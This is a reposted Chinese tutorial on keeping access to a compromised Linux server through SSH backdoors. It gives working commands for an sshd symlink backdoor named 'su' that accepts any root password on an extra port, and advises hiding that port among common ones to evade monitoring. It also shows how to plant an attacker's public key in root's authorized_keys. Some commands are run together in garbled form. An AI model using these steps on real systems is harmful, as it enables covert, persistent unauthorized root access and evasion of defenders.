linux维持访问-ssh后门


SSHD软连接后门



软连接后门是sshd启用PAM认证的前提下,利用了一个PAM配置文件

将sshd文件生成软连接,把名称设置为su,应用在启动中会去和PAM配置文件夹中寻找是否存在对应名称的配置信息(su)
只要pam_rootok模块检测uid是0即可认证成功,这样就导致了可以使用任意密码登录
开启PAM认证机制在/etc/ssh/sshd_config文件中,设置UsePAM为yes图片
查看/etc/pam.d/su文件存在auth  suddicient  pam_rootok.so就能创建软连接图片
创建用ln命令建立一个sshd软连接后门,并开启一个常见端口

ln -sf /usr/sbin/sshd /tmp/su/tmp/su -oport=2222

图片

连接然后可以ssh直接连接IP:端口,用户为root,密码任意输入即可图片好处是能够绕过一些网络设备的安全流量监测,但是本地监听端口时会很容易暴露
所以建议设置成常见端口8080、8000、8081等等
附视频操作

 

利用公钥无密码登录



原理是用ssh生成一个公钥放在服务器上,我们就可以通过ssh秘钥进行无密码连接服务器了

首先使用攻击主机生成rsa秘钥

ssh-keygen -t rsa

图片
这里有两个文件idrsa是连接ssh所用的私钥,idrsa.pub中的内容是公钥
把idrsa.pub写入服务端的authorizedkeys中图片

注意啊没有这个文件的话,就自己创建一个

在root目录下

mkdir ~/.sshcd .sshtouch authorized_keys

添加权限,可加可不加。

chmod 600 ~/.ssh/authorized_keyschmod 700 ~/.ssh

然后将公钥idrsa.pub内容写入文件

echo "id_rsa.pub的内容" > ~/.ssh/authorized_keys

图片

然后就可以用ssh使用秘钥无密码连接主机了。

图片

正常连接是提示输入密码的,写入公钥后无需输入密码。

 

附视频操作


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM